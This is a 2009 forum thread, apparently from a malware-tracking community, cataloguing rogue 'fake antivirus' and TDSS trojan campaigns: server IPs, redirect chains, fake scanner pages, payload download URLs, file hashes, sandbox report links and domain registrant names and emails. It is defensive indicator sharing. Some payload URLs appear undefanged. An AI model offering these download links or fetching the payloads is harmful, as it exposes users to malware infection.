VirusTotal (http://www.virustotal.com/analisis/ed0d6be2ddba79938799e70e5cfcd45f) - 5/40 (12.50%)
VirusTotal (http://www.virustotal.com/analisis/79ac0234d44a565d4ed1087d539b29b9) - 7/40 (17.50%)
VirusTotal (http://www.virustotal.com/analisis/00e53e9f1ded46f9480b760cbdac2142) - 4/40 (10.00%)
VirusTotal (http://www.virustotal.com/analisis/73aa4d4f4d67a54a5af493043e502c34) - 7/40 (17.50%)
VirusTotal (http://www.virustotal.com/analisis/73aa4d4f4d67a54a5af493043e502c34) - 7/40 (17.50%)
VirusTotal (http://www.virustotal.com/analisis/79ac0234d44a565d4ed1087d539b29b9) - 7/40 (17.50%)
VirusTotal (http://www.virustotal.com/analisis/73aa4d4f4d67a54a5af493043e502c34) - 7/40 (17.50%)
Title: Re: Rogue - Fake AV
Post by: SysAdMini on April 20, 2009, 10:20:51 am
205.252.24.226

Redirects to onlinespywarescanner.net

Code: [Select]
http://selectusers.com/tds3/in.cgi?6&camp=ron&cid=C8B673339383D26882AF488DB6B969329BCA7A4C7F5C7BE6&aid=4113&version=1.4.3
Fake AV
Code: [Select]
http://www.onlinespywarescanner.net/online-scan.html?ewmid=234&pwebmid=4113
82.98.193.102

Code: [Select]
http://tds1.onlineredirsystem.com/tds/in.cgi?22&cid=C8B673339383D26882AF488DB6B969329BCA7A4C7F5C7BE6&aid=4113redirects to
60.29.232.32
Code: [Select]
http://managesystem32.com/file/3896/4c933a7c5bf131de422b01ba3fe07b12/last.exehttp://www.virustotal.com/analisis/d4068c22f4b4d4845801489b5104be1a 27/40


85.17.254.158
Code: [Select]
http://toppromooffer.com/vsm/adv/5/?a=cspyock-sst&l=373&f=cs_2185226204&ex=1&ed=2&h=&sub=csp&prodabbr=3P_UVSM



Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 21, 2009, 04:34:24 pm
66.206.17.28

Code: [Select]
hxxp://scandata6.info/download/install.php
hxxp://scan6data.info/download/install.php
hxxp://scanmini6.info/download/install.php
hxxp://scan6lead.info/download/install.php
hxxp://scanlead6.info/download/install.php
hxxp://scan6list.info/download/install.php
hxxp://scanlist6.info/download/install.php
hxxp://scan6ever.info/download/install.php
hxxp://scan6fan.info/download/install.php

File name: install.exe
File size: 53248 bytes
MD5: fbc81c9ec9452a5b000d84f05d3b122c

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/11553c9baf07180cb3152c685382795b) - 21/40 (52.5%)

-----------------

66.206.17.28

Code: [Select]
hxxp://scanever6.info/download/xp/install.php
hxxp://scan6line.info/download/xp/install.php

File name: install.exe
File size: 40448 bytes
MD5: 5d254f2d27ff316097f76c76b8024fad

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/2ea7bb063248719a7894bde1860dbb5d) - 22/40 (55.00%)

-----------------

63.146.2.92

Code: [Select]
hxxp://scan4data.info/download/xp/install.php

File name: install.exe
File size: 40448 bytes
MD5: fbe0f66d8ddeecee4a41ff91fabac126

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/aa2b924d504d1d00382057261a5f0f20) - 22/40 (55%)

-----------------

63.146.2.92

Code: [Select]
hxxp://scandata4.info/download/xp/install.php

File name: install.exe
File size: 40448 bytes
MD5: 746dfd581f5eb4ceca4a9825eec23e5a

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/cec95f5f38d6be6cdb212be1d74b9a87)

-----------------

209.44.126.14

Code: [Select]
hxxp://basevirusscan.com/download.php
hxxp://basevirusscan.com/install/installpv.exe
hxxp://basevirusscan.com/install/ws.zip

VirusTotal: Trojan (http://www.virustotal.com/analisis/df3177374be6c16ba557b88b0bb9f3a1) - 12/40 (30%)
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/0e88b4a1ed30f5f179e91b4bfb035a79) - 10/40 (25%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/d2799f12e546a088d757225314ea0ca6) - 12/38 (31.58%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 22, 2009, 06:02:16 pm
69.10.52.12

Code: [Select]
hxxp://plus5scan.com/download/install.php
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/4c2e0567331afe9ae7d06af93c2b8640) - 16/40 (40%)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=186e0006c73071db4c1790645e5dd85b5)

Second download:

Code: [Select]
hxxp://in5ik.com/download/file.exe
hxxp://in5ik.com/download/InternetAntivirusPro.exe
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/2f71a01ae3529e1372b97744e440c61a) - 15/40 (37.5%)
VirusTotal: Fake Antivirus (http://www.virustotal.com/analisis/440a4d00aeb6fd5860033b12a4f7f7ba) - 2/40 (5%)

Code: [Select]
hxxp://in5sk.com/download/file.exe
hxxp://in5sk.com/download/InternetAntivirusPro.exe
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/f2c9b35130dd267c7299f38508e19388) - 33/40 (82.5%)
VirusTotal: Fake Antivirus (http://www.virustotal.com/analisis/e63802831507e24828f5f35f2e727325) - 10/39 (25.65%)

Redirects to rogue

66.206.17.28

Code: [Select]
hxxp://gomixscan.com
Wepawet (http://wepawet.iseclab.org/view.php?hash=bc40fd6948f811f351938ce104644fc9&t=1240423269&type=js)

91.212.41.111

Code: [Select]
hxxp://zyne4ka.com/in.cgi?6
Wepawet (http://wepawet.iseclab.org/view.php?hash=d1ce2aa96ec6ae8b344092593a001d68&t=1240407755&type=js)

91.212.41.110

Code: [Select]
hxxp://melodynew.cn/in.cgi?6
Wepawet (http://wepawet.iseclab.org/view.php?hash=fd2416a6e18b9374ed86a0d88ad535a7&t=1240423498&type=js)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 22, 2009, 08:16:15 pm
209.44.126.14

Redirects:
Code: [Select]
hxxp://systemvirusscan.com/in.php
hxxp://systemvirusscan.com/hitin.php
hxxp://systemvirusscan.com/page.php

Fake scanner page:
Code: [Select]
hxxp://systemvirusscan.com/index.php
hxxp://systemvirusscan.com/scan.php

Payloads:
Code: [Select]
hxxp://systemvirusscan.com/download.php
hxxp://systemvirusscan.com/install/installpv.exe
hxxp://systemvirusscan.com/install/ws.zip

VirusTotal: Trojan (http://www.virustotal.com/analisis/066a3117e6392ec6de89ef903a6e15eb) - 11/40 (27.5%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/c3d70a7166470c25fa0cdeab071bce85) - 4/40 (10%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/2906c3804a25b35bb44976abbf28b41d) - 10/40 (25%)

Redirects:
Code: [Select]
hxxp://pcguardscan.com/in.php
hxxp://pcguardscan.com/hitin.php
hxxp://pcguardscan.com/page.php

Fake scanner page:
Code: [Select]
hxxp://pcguardscan.com/index.php
hxxp://pcguardscan.com/scan.php

Payloads:
Code: [Select]
hxxp://pcguardscan.com/download.php
hxxp://pcguardscan.com/install/installpv.exe
hxxp://pcguardscan.com/install/ws.zip

VirusTotal: Trojan (http://www.virustotal.com/analisis/0e2535e0cb9acab4f4a1def941383d82) - 11/40 (27.5%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/184bf2330b8ede66498511b26b52f54e) - 4/40 (10%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/ab4c0a6f3d17906a8200ee617bd30c92) - 10/40 (25%)

91.212.65.55

Redirects:
Code: [Select]
hxxp://justwebsecurity.com/in.php
hxxp://justwebsecurity.com/hitin.php

Fake scanner page:
Code: [Select]
hxxp://justwebsecurity.com/index.php
hxxp://justwebsecurity.com/scan.php

Payloads:
Code: [Select]
hxxp://justwebsecurity.com/download.php
hxxp://justwebsecurity.com/install/installpv.exe
hxxp://justwebsecurity.com/install/ws.zip

VirusTotal: Trojan (http://www.virustotal.com/analisis/e157555bb849b402e42c86ae70e15f97) - 9/40 (22.5%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/bd698cc14d675908b33d2948317e3b34) - 4/40 (10%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/9c9c8bc6b327ec57063ae7448db42d5a) - 10/40 (25%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 24, 2009, 08:49:46 am
66.206.17.32

Code: [Select]
hxxp://leadscan6.info/download/install.php
hxxp://list6scan.info/download/install.php
hxxp://litescan6.info/download/install.php
hxxp://listscan6.com/download/xp/install.php
hxxp://listscan6.info/download/xp/install.php
hxxp://scanever6.info/download/xp/install.php
hxxp://scan6line.info/download/xp/install.php
hxxp://scan6data.info/download/install.php
hxxp://scan6lead.info/download/install.php
hxxp://scan6fan.info/download/install.php
hxxp://scanlead6.info/download/install.php
hxxp://scanlist6.info/download/install.php
hxxp://scandata6.info/download/install.php
hxxp://scanlite6.info/download/install.php
hxxp://scanmini6.info/download/install.php

Quote
Size: 52736 bytes,
MD5: f5fcb03a6743e02e1978a0baa05e77fe

VirusTotal: Trojan InternetAntivirus (TDSS) (http://www.virustotal.com/analisis/04ab7be9f10d44be64b0ab6577cf79e2) - 13/40 (32.5%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=11a0eaa7d18539844014e013921ed358a&call=first)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 24, 2009, 09:28:33 am
Rootkit TDSS

64.146.2.92

Code: [Select]
hxxp://basescan4.info/download/install.php
hxxp://base4scan.info/download/xp/install.php
hxxp://bestscan4.info/download/install.php
hxxp://fastscan4.info/download/xp/install.php
hxxp://fast4scan.info/download/install.php
hxxp://scanany4.info/download/install.php
hxxp://scanbest4.info/download/install.php
hxxp://scan4ever.info/download/install.php
hxxp://scan4data.info/download/xp/install.php
hxxp://scandata4.info/download/install.php
hxxp://scan4fast.info/download/xp/install.php
hxxp://scanfast4.info/download/install.php
hxxp://scanever4.info/download/install.php
hxxp://scanuser4.info/download/xp/install.php
hxxp://scanzoom4.info/download/install.php
hxxp://plus4scan.info/download/xp/install.php
hxxp://plusscan4.info/download/install.php
hxxp://user4scan.info/download/install.php

 :o

Quote
Size:   40448 bytes,
MD5:   4b440cd5a8999d7088103279cda8786e

VirusTotal (http://www.virustotal.com/analisis/e2dfd4c8a325bf204287faf8cb773f71) - 13/40 (32.5%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1e43f3b01d98760b4c93f30bcaa22cd9d)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 25, 2009, 07:19:35 pm
63.146.2.92

Code: [Select]
hxxp://scan4fuse.info/download/install.php
hxxp://scanfuse4.info/download/install.php
hxxp://fuse4scan.info/download/install.php
hxxp://fusescan4.info/download/install.php

Quote
Size:   40448 bytes,
MD5:   3afeafaf42a9e9caea12da0a0770521a

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/45293db3b3d2592d3444c924cc550460) - 19/40 (47.5%)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=1a08bbac7c6511de4a9a696abcf19edd1)

209.44.126.14 - FakeAV (Trojan Winwebsec)

Code: [Select]
hxxp://topwinsystemscan.com/download.php
hxxp://topwinsystemscan.com/install/installpv.exe
hxxp://topwinsystemscan.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/e77b7c7f587a9db013f1759b877442a4) - 13/40 (32.5%)
VirusTotal (http://www.virustotal.com/analisis/99e42964e42d7b523bb6eabdfee414dd) - 12/40 (30%)
VirusTotal (http://www.virustotal.com/analisis/3dd6e7c11663144c62ffaeafcd91b9a5) - 18/40 (45%)

Code: [Select]
hxxp://allvirusscannow.com/download.php
hxxp://allvirusscannow.com/install/installpv.exe
hxxp://allvirusscannow.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/30097e115a21df9abd08c8d9666ddc42) - 14/40 (35%)
VirusTotal (http://www.virustotal.com/analisis/1ff834dd412f58c47534968e831da2e6) - 12/40 (30%)
VirusTotal (http://www.virustotal.com/analisis/2947b22de084a2608167180fa19d2a53) - 19/40 (47.5%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 26, 2009, 12:06:31 am
63.146.2.92

Code: [Select]
hxxp://scanbase4.info/download/install.php
hxxp://scan4base.info/download/install.php

Quote
Size:   40448 bytes,
MD5:   3afeafaf42a9e9caea12da0a0770521a

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/b97e376fef65631fa338254f4aa883e4) - 20/40 (50%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 26, 2009, 05:43:11 am
194.165.4.77

Fake scanner page:
Code: [Select]
hxxp://tubeontvgl.com/scan/
Fake error page (codec):
Code: [Select]
hxxp://tubeontvgl.com/tube/
Payload:
Code: [Select]
hxxp://uploadmoviez.com/codec/.exeVirusTotal: Trojan (http://www.virustotal.com/analisis/a52377729002dcaff13afdf0a3084ae3) - 13/40 (32.5%)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=1f2774cc69dfeac349132bf53af2a7821)

Redirects to rogue:

63.146.2.92
Code: [Select]
hxxp://goscanatom.com
91.207.61.48
Code: [Select]
hxxp://wovens.info/cgi-bin/counter?id=823509&k=if+i+could+tell+you+one+thing&refWepawet Report (http://wepawet.iseclab.org/view.php?hash=58eda48786380026b51e5fb6557bb933&t=1240723534&type=js)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 26, 2009, 02:30:52 pm
66.96.252.199

Code: [Select]
hxxp://now4scan.info/download/install.php
hxxp://nowscan4.info/download/install.php
hxxp://open4scan.info/download/install.php
hxxp://openscan4.info/download/install.php
hxxp://scan4now.info/download/install.php
hxxp://scan4open.info/download/install.php
hxxp://scan4step.info/download/install.php
hxxp://scan4tool.info/download/install.php
hxxp://scannow4.info/download/install.php
hxxp://scanopen4.info/download/install.php
hxxp://scanstep4.info/download/install.php
hxxp://step4scan.info/download/install.php
hxxp://stepscan4.info/download/install.php
hxxp://toolscan4.info/download/install.php

Quote
File size: 40448 bytes
MD5: 8b9e917f497c0de02f75785bba7c763d
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/210d40e6ef1e6d7ae02d4600bbcafa05) - 14/40 (35%)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=1c582dcd046b86024fdaea67d0bdcec6c)

63.146.2.92

Code: [Select]
hxxp://any4scan.info/download/install.php
hxxp://anyscan4.info/download/install.php
hxxp://atom4scan.com/download/install.php
hxxp://atomscan4.com/download/install.php
hxxp://scan4any.info/download/xp/install.php
hxxp://scan4atom.com/download/xp/install.php
hxxp://scan4list.com/download/install.php
hxxp://scanstar4.com/download/xp/install.php
hxxp://zoom4scan.info/download/install.php

Quote
File size: 40448 bytes
MD5: 3afeafaf42a9e9caea12da0a0770521a
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/8d50c1d4b16806753c9cebeef2efe5a4) - 21/40 (52.5%)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=1c06ea3d9d0d462046da5035922b5c265&call=first)

69.10.52.11

Code: [Select]
hxxp://live5scan.info/download/install.php
hxxp://new5scan.info/download/install.php
hxxp://scan5best.info/download/install.php
hxxp://scan5live.info/download/install.php
hxxp://scan5new.info/download/install.php

Quote
File size: 40448 bytes
MD5: 5b1212ac7029c3135331e2d7e1c70d82
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/56ed514ffe6dd5f95e18e754f4a0b888) - 14/40 (35%)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=1af208a354fe3a58421fa96247f6d2155&call=first)

Second download:

Code: [Select]
hxxp://in5ih.com/download/file.exe
hxxp://in5ih.com/download/InternetAntivirusPro.exe
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/e6384b4ca8e9478c40c62a9f3d5969b5) - 13/40 (32.5%)
VirusTotal: Trojan InternetAntivirusPro (http://www.virustotal.com/analisis/72a3764ca178e9a9eea099d87389d096) - 7/40 (17.5%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 26, 2009, 02:38:52 pm
69.10.52.11
Code: [Select]
hxxp://best5scan.info/download.php
69.10.52.12
Code: [Select]
hxxp://fast5scan.com/download/install.php

Quote
Size:   40448 bytes
MD5:   5b1212ac7029c3135331e2d7e1c70d82
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/a8fb766959c6f1884db22ca882aba6ed) - 15/40 (37.5%)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=10634e077e64ec374d96e9c1b6770dd58&call=first)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 28, 2009, 08:11:23 am
Redirects to rogue:

91.212.41.110
Code: [Select]
hxxp://lemmydislikes.com/in.cgi?6Wepawet (http://wepawet.iseclab.org/view.php?hash=01621d76957200dcb9262d4a2ff2b903&t=1240904152&type=js)

216.195.35.99
Code: [Select]
hxxp://seaarch.info/in.cgi?2&group=5&parameter=visual+basic+game+programsWepawet (http://wepawet.iseclab.org/view.php?hash=7d71709fb55bbd8b8bc8027db3dadc81&t=1240904358&type=js)

87.248.163.58
Code: [Select]
hxxp://098765.com/in.php
hxxp://999666999.com/in.php
hxxp://berrousmark2009.com/in.php
hxxp://dbytedelicious.com/in.php
hxxp://dbytedelicious.net/in.php
hxxp://dbytedelicious.org/in.php
hxxp://infidelirium.net/in.php
hxxp://infidelirium.org/in.php
hxxp://lastpoher.ru/in.php
hxxp://massmarker2009.com/in.php
hxxp://murtinreid.com/in.php
hxxp://murtinreid.net/in.php
hxxp://sendsometraff.com/in.php
hxxp://x-more-x.net/in.php
hxxp://zerromark2009.com/in.php
hxxp://zorroless.com/in.php

Wepawet (http://wepawet.iseclab.org/view.php?hash=d9530a5ce598802235f11ecebe1b2f26&t=1240904781&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=85772aca1dd07bb7041ac7c8f52bd06b&t=1240904777&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=97f2f2f23bab8f3c561b7062de206ad0&t=1240904769&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=104a4dda02430272b2f93348cb4fa43b&t=1240904767&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=e9f6b5b4e8f120c38e9d15c91f4d481c&t=1240904762&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=7eb57aa34d8cb0fc9449c577f99fc75a&t=1240904758&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=18a0fb8e189b382347f5636fdeb7e223&t=1240904746&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=d174d4ead6171bdf1e9e6655f925c332&t=1240904745&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=29637bfb47dd5ecd85bcf7760c68026c&t=1240904712&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=b52325038ee07b421b8fe63b081ee9a4&t=1240904696&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=68589203f390c92a92eef88873b1043c&t=1240904646&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=4c51e9d50ec80bbc0407f9c237db85f5&t=1240904645&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=6fd4722dce2d50dcb1d773f7958ec3fe&t=1240904638&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=41344d8160a15aad778076f1818a2bb8&t=1240904635&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=531bd6b95ff13ddb821861cdbdb5e045&t=1240904630&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=47db177a0ea274454ca4335499cee165&t=1240904628&type=js)

Rogue Antivirus:
209.44.126.14
Code: [Select]
hxxp://totalvirushield.com/download.php
hxxp://totalvirushield.com/download/installpv.exe
hxxp://totalvirushield.com/download/ws.zip
VirusTotal (http://www.virustotal.com/analisis/ee0e180e6f62cabbcdd672c30321ad56) - 16/40 (40%)
VirusTotal (http://www.virustotal.com/analisis/42b641e1d2baa348045ef0f591abe1bd) - 7/40 (17.5%)
VirusTotal (http://www.virustotal.com/analisis/4a2aad6e6be79c592bc54a781f61e492) - 3/40 (7.5%)

63.146.2.92
Code: [Select]
hxxp://home4scan.info/download/install.php
hxxp://scan4home.info/download/install.php
hxxp://scanhome4.info/download/install.php
hxxp://scan4gate.info/download/install.php
hxxp://scangate4.info/download/install.php
hxxp://gate4scan.info/download/install.php
hxxp://gatescan4.info/download/install.php

Quote
Size:   39936 bytes,
MD5:   126fa3ed7b131e8de7b4fee1b2ce0e21

VirusTotal (http://www.virustotal.com/analisis/38de509a64035df0315039b8ce6cde47) - 10/40 (25.00%)

Redirects to rogue:

63.146.2.92
Code: [Select]
hxxp://goscanarea.com
hxxp://goscanelite.com
hxxp://goscanfile.com
hxxp://goscanfix.com
hxxp://goscangoal.com
hxxp://goscankey.com
hxxp://goscanmeta.com
hxxp://goscanmore.com
hxxp://goscannote.com
hxxp://goscantop.com
hxxp://goscanwork.com
hxxp://goareascan.com
hxxp://goelitescan.com
hxxp://gofilescan.com
hxxp://gofixscan.com
hxxp://gogoalscan.com
hxxp://gokeyscan.com
hxxp://gometascan.com
hxxp://gomorescan.com

Wepawet (http://wepawet.iseclab.org/view.php?hash=32aabd3e946f282c65b2ef697b1a48da&t=1240905710&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=63cd27f869041868f03930d27abe4d87&t=1240905713&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=d60081626c0ae4ee1c3d0b3be232b8ea&t=1240905715&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=1b75e803a50fe43fe3ed554a69f1d78a&t=1240905717&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=521f3565677af04acd519b47ee0f290f&t=1240905722&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=212dc28829d7f0d4ec699e313dbf6994&t=1240905725&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=b02c31ff4a9cf7052b8e2e2641df716a&t=1240905730&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=02d121ab3094a2af9c009340477f5ae8&t=1240905735&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=175058d1b2c6841f436e7901aa1c9d08&t=1240905741&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=4f849da442311a8436ba3750366a19a2&t=1240905765&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=eb4e1ea2888d749f1adb0ed7a3463f29&t=1240905763&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=0dd85c4c2d32137b45df3a283e2579be&t=1240905761&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=e068a1fd02ef3035508944618bf0b57f&t=1240905774&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=c9376ff6781541d12fe1544219bd23c6&t=1240905781&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=43580ca6712cef6c349bb5c6ee4aff26&t=1240905789&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=791d4cf6cbaffe874e927eb6a4fdfc9f&t=1240905795&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=81588530d4078c77437abd636e7c87f5&t=1240905801&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=53608db70921af077207c8b591af68e7&t=1240905808&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=f00a9fa7f2cb1f6559c760c29fbf8eda&t=1240905814&type=js)

Redirects to rogue:

66.96.252.199
Code: [Select]
hxxp://gonotescan.com
hxxp://goscanwork.com
Wepawet (http://wepawet.iseclab.org/view.php?hash=ea5af7879c2d1a30bc526ea6a18b15bc&t=1240906151&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=eb4e1ea2888d749f1adb0ed7a3463f29&t=1240906164&type=js)

Rogue Antivirus:

66.96.252.199
Code: [Select]
hxxp://nowscan4.info/download/install/php
VirusTotal (http://www.virustotal.com/analisis/93a8a65bb8a40bd81236bd37ff149931) - 9/40 (22.5%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1252d2eea57c45094cd8fbd09bc62da22)
Title: Re: Rogue - Fake AV
Post by: RS-232 on April 28, 2009, 09:57:29 am
Quote
hxxp://ha-virus2009.com/install/Installer.exe

Have fun exploring the rest of rogue av-related domains there...
http://www.bfk.de/bfk_dnslogger.html?query=80.79.118.186#result
http://www.bfk.de/bfk_dnslogger.html?query=80.79.118.190#result
http://www.bfk.de/bfk_dnslogger.html?query=94.75.253.92#result
http://www.bfk.de/bfk_dnslogger.html?query=124.217.238.169#result
http://www.bfk.de/bfk_dnslogger.html?query=212.95.53.246#result

Title: Re: Rogue - Fake AV
Post by: SysAdMini on May 02, 2009, 09:01:46 am
Code: [Select]
http://antivirus-powerful-scannerv2.com/download/Install_11-1.exehttp://www.virustotal.com/analisis/8ad4d65036ead9403f38442d5d5d8de8 7/40
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 02, 2009, 10:56:32 am
78.159.115.215 - 78.159.115.215.internetserviceteam.com

freegechscan.info - Louis Hayes - nalatch@ gmail.com
gechscannow.info - John Aschinger - plutommy@ gmail.com
gescanch.info - Louis Hayes - nalatch@ gmail.com
gescanchnow.info - Frederick Arva - bosotlet@ gmail.com
nowscangech.info - Frederick Arva - bosotlet@ gmail.com
scan4lite.info - John Aschinger - plutommy@ gmail.com
scanlite4.info  - John Aschinger - plutommy@ gmail.com
lead4scan.info  - John Aschinger - plutommy@ gmail.com
linescan4.info  - John Aschinger - plutommy@ gmail.com
lite4scan.info - John Aschinger - plutommy@ gmail.com
litescan4.info - John Aschinger - plutommy@ gmail.com
listscan4.info - John Aschinger - plutommy@ gmail.com
list4scan.info - John Aschinger - plutommy@ gmail.com
livescan4.info - John Aschinger - plutommy@ gmail.com
scan4list.info - John Aschinger - plutommy@ gmail.com
scanlist4.info - John Aschinger - plutommy@ gmail.com
scan4lead.info - John Aschinger - plutommy@ gmail.com
scan4line.info - John Aschinger - plutommy@ gmail.com
scan4list.info - John Aschinger - plutommy@ gmail.com
scan4lite.info - John Aschinger - plutommy@ gmail.com
scanlite4.info - John Aschinger - plutommy@ gmail.com
scanlive4.info - John Aschinger - plutommy@ gmail.com

64.20.33.156

fuse6scan.info - George Fults - sigratzie@ gmail.com
fusescan6.info - George Fults - sigratzie@ gmail.com
scan6fuse.info - George Fults - sigratzie@ gmail.com
scanfuse6.info - George Fults - sigratzie@ gmail.com
step6scan.info - George Fults - sigratzie@ gmail.com
stepscan6.info - George Fults - sigratzie@ gmail.com
scanstep6.info- George Fults - sigratzie@ gmail.com
scan6step.info- George Fults - sigratzie@ gmail.com
scan6ray.info - George Fults - sigratzie@ gmail.com
scan6star.info - George Fults - sigratzie@ gmail.com
star6scan.info - George Fults - sigratzie@ gmail.com
ray6scan.info - George Fults - sigratzie@ gmail.com
Title: Re: Rogue - Fake AV
Post by: CkreM on May 03, 2009, 11:53:37 am
Fake AV:
Code: [Select]
system-protector.org
av-lookup.com
srv-scan.us
srv-scan.biz
Ms-scan.biz
Ms-scan.info
Ms-scan.net
ms-scan.org
Title: Re: Rogue - Fake AV
Post by: CkreM on May 03, 2009, 04:15:44 pm
Redirects to fake AV
Code: [Select]
2b0a74.beladen.net/indd.phpFake AV:
Code: [Select]
onlinesecurityhost.com
scan4lux.info
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 03, 2009, 05:35:51 pm
I just ran another scan. 40 online on 3 different IPs

the new are:

Code: [Select]
hxxp://main4scan.info
hxxp://mainscan4.info
hxxp://scanmain4.info
hxxp://scan4main.info
hxxp://scan4true.info
hxxp://scan4user.info
hxxp://scan4way.info
hxxp://scantrue4.info
hxxp://true4scan.info
hxxp://truescan4.info
hxxp://userscan4.info
hxxp://wayscan4.info
hxxp://zoomscan4.info

VirusTotal (http://www.virustotal.com/analisis/024c55e56547a1f7fca0f9b8d5d7a9d8) - 8/40 (20%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=120bb17cf9875c2b4c1b46d1ef1cd1bd8)

hosted on 209.44.126.102

Registrant Name: Benn Tinkman
Registrant Email: bnntnkmn@ gmail.com

(http://img159.imageshack.us/img159/6449/scana.jpg)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 03, 2009, 06:42:08 pm
78.159.115.215

Code: [Select]
hxxp://geninch.com/download/InternetAntivirusPro.exe
hxxp://geninch.com/download/file.exe
hxxp://stagech.com/reports/download-report.php?prod_id=9

VirusTotal: Trojan InternetAntivirusPro (http://www.virustotal.com/analisis/5c4940492fda07b45ce3477ee8e5b9c7) - 4/40 (10%)
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/29c886552407dbbdd844f2ef0aa6a68f) - 5/40 (12.5%)
Source: Anubis Report (http://anubis.iseclab.org/?action=result&task_id=19714ed1f1a73e6f4956dfc306ea48141&format=html)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 04, 2009, 09:16:35 pm
209.44.126.102

Code: [Select]
hxxp://scan4mega.info
hxxp://scanmega4.info
hxxp://mega4scan.info

Wepawet (http://wepawet.iseclab.org/view.php?hash=212dc28829d7f0d4ec699e313dbf6994&t=1241472157&type=js)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1acb802af67b981e4d5b09f9331301705)
VirusTotal (http://www.virustotal.com/analisis/3fd8172c585e2a46b2f5e90293089e33) - 11/40 (27.50%)

Registrant Name:Benn Tinkman
Registrant Email:bnntnkmn@ gmail.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on May 04, 2009, 09:39:44 pm
209.44.126.22

Code: [Select]
hxxp://onlinebrandsecuritys.com/download.php
hxxp://onlinebrandsecuritys.com/install/ws.exe
hxxp://onlinebrandsecuritys.com/install/ws.zip

install.exe
VirusTotal (http://www.virustotal.com/analisis/0154de00e1dbea82c7ecad471bc9e8f1) - 19/40 (47.5%)
